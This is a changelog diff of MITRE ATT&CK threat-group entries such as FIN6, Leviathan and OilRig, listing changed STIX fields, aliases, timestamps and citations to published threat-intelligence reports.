external_references[3]['description']FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021.AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021.
external_references[3]['url']https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.dohttp://download.ahnlab.com/global/brochure/[Analysis]Andariel_Group.pdf
external_references[4]['source_name']IssueMakersLab Andariel GoldenAxe May 2017TrendMicro New Andariel Tactics July 2018
external_references[4]['description']IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021.Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021.
external_references[4]['url']http://www.issuemakerslab.com/research3/https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html
external_references[5]['source_name']AhnLab Andariel Subgroup of Lazarus June 2018CrowdStrike Silent Chollima Adversary September 2021
external_references[5]['description']AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021.CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021.
external_references[5]['url']http://download.ahnlab.com/global/brochure/[Analysis]Andariel_Group.pdfhttps://adversary.crowdstrike.com/en-US/adversary/silent-chollima/
external_references[6]['source_name']TrendMicro New Andariel Tactics July 2018FSI Andariel Campaign Rifle July 2017
external_references[6]['description']Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021.FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021.
external_references[6]['url']https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.htmlhttps://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do
external_references[7]['source_name']CrowdStrike Silent Chollima Adversary September 2021IssueMakersLab Andariel GoldenAxe May 2017
external_references[7]['description']CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021.IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021.
external_references[7]['url']https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/http://www.issuemakerslab.com/research3/

[G0114] Chimera

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 21:53:00.909000+00:002022-03-25 19:35:55.074000+00:00

[G0003] Cleaver

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 19:34:36.092000+00:002022-07-22 18:37:22.178000+00:00

[G0009] Deep Panda

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 13:49:09.605000+00:002022-07-20 20:10:29.593000+00:00
external_references[7]['url']https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/
external_references[8]['source_name']ThreatConnect AnthemSymantec Black Vine
external_references[8]['description']ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016.
external_references[8]['url']https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf
external_references[10]['source_name']Symantec Black VineICIT China's Espionage Jul 2016
external_references[10]['description']DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016.Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.
external_references[10]['url']http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdfhttps://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/
external_references[11]['source_name']ICIT China's Espionage Jul 2016ThreatConnect Anthem
external_references[11]['description']Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.
external_references[11]['url']https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/

[G0037] FIN6

Current version: 3.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 17:23:58.316000+00:002022-06-02 20:11:01.957000+00:00
aliases[2]SKELETON SPIDERITG08
aliases[3]ITG08Skeleton Spider
external_references[1]['source_name']FIN6Skeleton Spider
external_references[1]['description'](Citation: FireEye FIN6 April 2016)(Citation: Crowdstrike Global Threat Report Feb 2018)
external_references[2]['source_name']Magecart Group 6FIN6
external_references[2]['description'](Citation: Security Intelligence ITG08 April 2020)(Citation: FireEye FIN6 April 2016)
external_references[3]['source_name']SKELETON SPIDERMagecart Group 6
external_references[3]['description'](Citation: Crowdstrike Global Threat Report Feb 2018)(Citation: Security Intelligence ITG08 April 2020)
external_references[5]['source_name']FireEye FIN6 April 2016Crowdstrike Global Threat Report Feb 2018
external_references[5]['description']FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.
external_references[5]['url']https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdfhttps://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report
external_references[6]['source_name']FireEye FIN6 Apr 2019FireEye FIN6 April 2016
external_references[6]['description']McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.
external_references[6]['url']https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.htmlhttps://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf
external_references[7]['source_name']Security Intelligence ITG08 April 2020FireEye FIN6 Apr 2019
external_references[7]['description']Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.
external_references[7]['url']https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
external_references[8]['source_name']Crowdstrike Global Threat Report Feb 2018Security Intelligence ITG08 April 2020
external_references[8]['description']CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.
external_references[8]['url']https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-reporthttps://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/

[G0117] Fox Kitten

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 22:02:30.995000+00:002022-06-02 20:12:00.458000+00:00
aliases[2]PIONEER KITTENParisite
aliases[3]ParisitePioneer Kitten
external_references[2]['source_name']PIONEER KITTENPioneer Kitten
external_references[4]['source_name']ClearkSky Fox Kitten February 2020CISA AA20-259A Iran-Based Actor September 2020
external_references[4]['description']ClearSky. (2020, February 16). Fox Kitten – Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020.CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.
external_references[4]['url']https://www.clearskysec.com/fox-kitten/https://us-cert.cisa.gov/ncas/alerts/aa20-259a
external_references[5]['source_name']CrowdStrike PIONEER KITTEN August 2020ClearSky Pay2Kitten December 2020
external_references[5]['description']Orleans, A. (2020, August 31). Who Is PIONEER KITTEN?. Retrieved December 21, 2020.ClearSky. (2020, December 17). Pay2Key Ransomware – A New Campaign by Fox Kitten. Retrieved December 21, 2020.
external_references[5]['url']https://www.crowdstrike.com/blog/who-is-pioneer-kitten/https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf
external_references[6]['source_name']Dragos PARISITE ClearkSky Fox Kitten February 2020
external_references[6]['description']Dragos. (n.d.). PARISITE. Retrieved December 21, 2020.ClearSky. (2020, February 16). Fox Kitten – Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020.
external_references[6]['url']https://www.dragos.com/threat/parisite/https://www.clearskysec.com/fox-kitten/
external_references[7]['source_name']ClearSky Pay2Kitten December 2020Dragos PARISITE
external_references[7]['description']ClearSky. (2020, December 17). Pay2Key Ransomware – A New Campaign by Fox Kitten. Retrieved December 21, 2020.Dragos. (n.d.). PARISITE. Retrieved December 21, 2020.
external_references[7]['url']https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdfhttps://www.dragos.com/threat/parisite/
external_references[8]['source_name']CISA AA20-259A Iran-Based Actor September 2020CrowdStrike PIONEER KITTEN August 2020
external_references[8]['description']CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.Orleans, A. (2020, August 31). Who Is PIONEER KITTEN?. Retrieved December 21, 2020.
external_references[8]['url']https://us-cert.cisa.gov/ncas/alerts/aa20-259ahttps://www.crowdstrike.com/blog/who-is-pioneer-kitten/

[G0065] Leviathan

Current version: 3.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.crowdstrike.com/blog/two-birds-one-stone-panda/
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 20:34:57.289000+00:002022-04-15 15:15:51.198000+00:00
external_references[1]['source_name']LeviathanMUDCARP
external_references[1]['description'](Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)
external_references[2]['source_name']MUDCARPKryptonite Panda
external_references[2]['description'](Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Crowdstrike KRYPTONITE PANDA August 2018)
external_references[3]['source_name']Kryptonite PandaGadolinium
external_references[3]['description'](Citation: CISA AA21-200A APT40 July 2021)(Citation: Crowdstrike KRYPTONITE PANDA August 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: MSTIC GADOLINIUM September 2020)
external_references[4]['source_name']GadoliniumBRONZE MOHAWK
external_references[4]['description'](Citation: CISA AA21-200A APT40 July 2021)(Citation: MSTIC GADOLINIUM September 2020)(Citation: CISA AA21-200A APT40 July 2021)(Citation: SecureWorks BRONZE MOHAWK n.d.)
external_references[5]['source_name']BRONZE MOHAWKLeviathan
external_references[5]['description'](Citation: CISA AA21-200A APT40 July 2021)(Citation: SecureWorks BRONZE MOHAWK n.d.)(Citation: Proofpoint Leviathan Oct 2017)
external_references[6]['description']Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye APT40 March 2019)[Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye APT40 March 2019)
external_references[7]['source_name']APT40TEMP.Periscope
external_references[7]['description']FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)[Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)
external_references[8]['source_name']TEMP.PeriscopeAccenture MUDCARP March 2019
external_references[8]['description']Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.
external_references[9]['source_name']CISA AA21-200A APT40 July 2021Crowdstrike KRYPTONITE PANDA August 2018
external_references[9]['description']CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department.. Retrieved August 12, 2021.Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021.
external_references[9]['url']https://us-cert.cisa.gov/ncas/alerts/aa21-200ahttps://www.crowdstrike.com/blog/two-birds-one-stone-panda/
external_references[11]['source_name']FireEye Periscope March 2018MSTIC GADOLINIUM September 2020
external_references[11]['description']FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021.
external_references[11]['url']https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.htmlhttps://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/
external_references[12]['source_name']Accenture MUDCARP March 2019CISA AA21-200A APT40 July 2021
external_references[12]['description']Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021.
external_references[12]['url']https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologieshttps://us-cert.cisa.gov/ncas/alerts/aa21-200a
external_references[13]['source_name']Crowdstrike KRYPTONITE PANDA August 2018APT40
external_references[13]['description']Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021.FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)
external_references[14]['source_name']MSTIC GADOLINIUM September 2020FireEye Periscope March 2018
external_references[14]['description']Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021.FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
external_references[14]['url']https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
external_references[15]['source_name']SecureWorks BRONZE MOHAWK n.d.FireEye APT40 March 2019
external_references[15]['description']SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021.Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.
external_references[15]['url']https://www.secureworks.com/research/threat-profiles/bronze-mohawkhttps://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html
external_references[16]['source_name']FireEye APT40 March 2019SecureWorks BRONZE MOHAWK n.d.
external_references[16]['description']Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021.
external_references[16]['url']https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.htmlhttps://www.secureworks.com/research/threat-profiles/bronze-mohawk

[G0133] Nomadic Octopus

Current version: 1.0


Old Description
New Description
t1 [Nomadic Octopus](https://attack.mitre.org/groups/G0133) ist1 [Nomadic Octopus](https://attack.mitre.org/groups/G0133) is
> a Russian-speaking cyberespionage threat group that has pri> a Russian-speaking cyber espionage threat group that has pr
>marily targeted Central Asia, including local governments, d>imarily targeted Central Asia, including local governments, 
>iplomatic missions, and individuals, since at least 2014. [N>diplomatic missions, and individuals, since at least 2014. [
>omadic Octopus](https://attack.mitre.org/groups/G0133) has b>Nomadic Octopus](https://attack.mitre.org/groups/G0133) has 
>een observed conducting campaigns involving Android and Wind>been observed conducting campaigns involving Android and Win
>ows malware, mainly using the Delphi programming language, a>dows malware, mainly using the Delphi programming language, 
>nd building custom variants.(Citation: Security Affairs Dust>and building custom variants.(Citation: Security Affairs Dus
>Squad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citat>tSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Cita
>ion: ESET Nomadic Octopus 2018)>tion: ESET Nomadic Octopus 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 15:22:52.708000+00:002022-09-02 18:03:55.294000+00:00
description [Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyberespionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) [Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)
external_references[1]['source_name']Nomadic OctopusDustSquad
external_references[1]['description'](Citation: SecurityWeek Nomadic Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: SecurityWeek Nomadic Octopus Oct 2018)
external_references[2]['source_name']DustSquadNomadic Octopus
external_references[2]['description'](Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: SecurityWeek Nomadic Octopus Oct 2018)(Citation: SecurityWeek Nomadic Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)
external_references[3]['source_name']Security Affairs DustSquad Oct 2018ESET Nomadic Octopus 2018
external_references[3]['description']Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.
external_references[3]['url']https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.htmlhttps://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf
external_references[5]['source_name']ESET Nomadic Octopus 2018SecurityWeek Nomadic Octopus Oct 2018
external_references[5]['description']Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021.
external_references[5]['url']https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdfhttps://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia
external_references[6]['source_name']SecurityWeek Nomadic Octopus Oct 2018Security Affairs DustSquad Oct 2018
external_references[6]['description']Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021.Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.
external_references[6]['url']https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asiahttps://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html

[G0049] OilRig

Current version: 3.0


Old Description
New Description
t1[OilRig](https://attack.mitre.org/groups/G0049) is a suspectt1[OilRig](https://attack.mitre.org/groups/G0049) is a suspect
>ed Iranian threat group that has targeted Middle Eastern and>ed Iranian threat group that has targeted Middle Eastern and
> international victims since at least 2014. The group has ta> international victims since at least 2014. The group has ta
>rgeted a variety of sectors, including financial, government>rgeted a variety of sectors, including financial, government
>, energy, chemical, and telecommunications. It appears the g>, energy, chemical, and telecommunications. It appears the g
>roup carries out supply chain attacks, leveraging the trust >roup carries out supply chain attacks, leveraging the trust 
>relationship between organizations to attack their primary t>relationship between organizations to attack their primary t
>argets. FireEye assesses that the group works on behalf of t>argets. FireEye assesses that the group works on behalf of t
>he Iranian government based on infrastructure details that c>he Iranian government based on infrastructure details that c
>ontain references to Iran, use of Iranian infrastructure, an>ontain references to Iran, use of Iranian infrastructure, an
>d targeting that aligns with nation-state interests. (Citati>d targeting that aligns with nation-state interests.(Citatio
>on: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig >n: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Ja
>Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: P>n 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo 
>alo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 20>Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(C
>17) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUA>itation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT
>DAGENT July 2018)> July 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 22:04:08.941000+00:002022-06-02 20:18:52.733000+00:00
description[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)
aliases[3]HELIX KITTENAPT34
aliases[4]APT34Helix Kitten
external_references[1]['source_name']OilRigIRN2
external_references[1]['description'](Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)
external_references[2]['source_name']COBALT GYPSYOilRig
external_references[2]['description'](Citation: Secureworks COBALT GYPSY Threat Profile)(Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018)
external_references[3]['source_name']IRN2COBALT GYPSY
external_references[3]['description'](Citation: Crowdstrike Helix Kitten Nov 2018)(Citation: Secureworks COBALT GYPSY Threat Profile)
external_references[4]['source_name']HELIX KITTENHelix Kitten
external_references[5]['source_name']APT34Check Point APT34 April 2021
external_references[5]['description']This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.
external_references[6]['source_name']Palo Alto OilRig April 2017ClearSky OilRig Jan 2017
external_references[6]['description']Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.
external_references[6]['url']http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/http://www.clearskysec.com/oilrig/
external_references[7]['source_name']ClearSky OilRig Jan 2017Palo Alto OilRig May 2016
external_references[7]['description']ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
external_references[7]['url']http://www.clearskysec.com/oilrig/http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
external_references[8]['source_name']Palo Alto OilRig May 2016Palo Alto OilRig April 2017
external_references[8]['description']Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.
external_references[8]['url']http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/
external_references[10]['source_name']Unit 42 Playbook Dec 2017Unit 42 QUADAGENT July 2018
external_references[10]['description']Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
